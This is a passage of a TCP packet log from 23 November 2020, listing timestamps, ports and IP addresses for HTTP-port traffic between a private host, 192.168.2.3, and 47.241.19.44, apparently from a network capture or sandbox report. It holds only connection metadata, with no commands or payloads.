Nov 23, 2020 16:11:54.946069002 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.946085930 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.946100950 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.946114063 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.946125984 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.946142912 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.946151972 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.946208000 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.988616943 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.988639116 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.988651037 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.988667965 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.988682985 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.988698959 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.988714933 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.988730907 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.988753080 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.988751888 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.988792896 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.988821030 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.992264986 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.992360115 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.157984972 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.158008099 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.158020973 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.158035040 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.158051968 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.158067942 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.158085108 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.158101082 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.158124924 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.158164978 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.158183098 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.158202887 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.158235073 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.200730085 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.200757980 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.200778008 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.200798035 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.200819016 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.200839043 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.200849056 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.200860023 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.200881958 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.200907946 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.200921059 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.200932980 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.200956106 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.200977087 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.204005957 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.204106092 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.416100979 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416126013 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416141033 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416161060 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416181087 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416201115 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416204929 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.416220903 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416240931 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416249990 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.416261911 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416281939 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416306019 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416306973 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.416327000 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416331053 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.416347027 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416367054 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416369915 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.416387081 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416405916 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416420937 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.416424990 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416445971 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416452885 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.416470051 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416479111 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.416492939 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416510105 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.416517973 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.416552067 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.455379963 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.455485106 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.458703041 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.458802938 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.582567930 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.582601070 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.582613945 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.582631111 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.582643032 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.582665920 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.582684994 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.582701921 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.582720041 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.582736969 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.582747936 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.582813025 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.582830906 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.625055075 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.625130892 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.625212908 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.625256062 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.628163099 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.628205061 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.628252029 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.628257990 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.628289938 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.628295898 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.628319025 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.628335953 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.628353119 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.628374100 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.628395081 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.628412962 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.628423929 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.628451109 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.628460884 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.628489017 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.628499985 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.628539085 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.674504042 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.674623013 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.711230040 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.711349964 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.713332891 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.713471889 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.794744015 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.794779062 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.794794083 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.794812918 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.794832945 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.794856071 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.794877052 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.794898033 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.794909000 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.794915915 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.794939041 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.794964075 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.794989109 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.837033033 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.837068081 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.837174892 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.840183020 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.840208054 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.840230942 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.840251923 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.840271950 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.840286970 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.840291977 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.840318918 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.840331078 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.840342999 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.840363026 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.840363026 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.840392113 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.840442896 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.840553045 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.840616941 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.967288971 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.967331886 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.967511892 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:55.969176054 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:55.969333887 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:56.006911993 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:56.006949902 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:56.006978035 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:56.007002115 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:56.007019043 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:56.007061958 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:56.033672094 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:56.129333973 CET	49727	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:56.295663118 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:56.454231977 CET	80	49727	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:56.947292089 CET	80	49727	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:56.947403908 CET	49727	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:56.954339981 CET	49727	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:57.238349915 CET	80	49727	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:58.017582893 CET	49730	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:58.017623901 CET	49731	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:58.278985977 CET	80	49731	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:58.279073000 CET	49731	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:58.279874086 CET	49731	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:58.290173054 CET	80	49730	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:58.290283918 CET	49730	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:58.581444979 CET	80	49731	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:59.182948112 CET	80	49731	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:59.182986021 CET	80	49731	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:59.182993889 CET	80	49731	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:59.183650017 CET	49731	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:59.206315041 CET	49731	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:59.467017889 CET	80	49731	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:00.211863995 CET	49730	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:52.453594923 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:52.722826004 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:52.722934961 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:52.723073959 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.035968065 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.376138926 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.376161098 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.376179934 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.376200914 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.376216888 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.376233101 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.376247883 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.376262903 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.376277924 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.376286030 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.376292944 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.376342058 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.376349926 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.376429081 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.645526886 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645555019 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645570993 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645587921 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645601988 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645620108 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645636082 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645647049 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.645657063 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645673037 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.645678043 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645694971 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645708084 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645718098 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.645725965 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645745039 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645749092 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.645762920 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645780087 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645786047 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.645797968 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645813942 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645826101 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.645847082 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.645884991 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.759378910 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.759488106 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.759685993 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.915090084 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.915126085 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.915149927 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.915172100 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.915193081 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.915213108 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.915225983 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.915232897 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.915254116 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.915263891 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.915276051 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.915283918 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.915302038 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.915324926 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.915335894 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.915347099 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.915358067 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.915369034 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.915390015 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.915409088 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.915420055 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.915426970 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.915441036 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.915565014 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.951234102 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.951308012 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.951340914 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.951369047 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.951406956 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.951446056 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.951482058 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.951519966 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.951550961 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.951560020 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.951611042 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.951648951 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.951653957 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.951689005 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.951692104 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.951735020 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.951766014 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.951775074 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.951811075 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.951848984 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.951850891 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.951886892 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:53.951920033 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:53.995433092 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.029006004 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.073884010 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.184711933 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.184818029 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.184885025 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.184971094 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.185045958 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.185058117 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.185081959 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.185144901 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.185189962 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.185231924 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.185246944 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.185271025 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.185313940 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.185318947 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.185360909 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.185388088 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.185436964 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.185476065 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.185514927 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.185517073 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.185554028 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.185591936 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.185615063 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.185632944 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.185663939 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.185671091 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.185714006 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.185740948 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.229901075 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.334140062 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.334165096 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.334181070 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.334197044 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.334216118 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.334233046 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.334249973 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.334250927 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.334265947 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.334280014 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.334284067 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.334299088 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.334302902 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.334321022 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.334330082 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.334337950 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.334363937 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.334398031 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.343317986 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.375657082 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.375698090 CET	80	49746	47.241.19.44	192.168.2.3
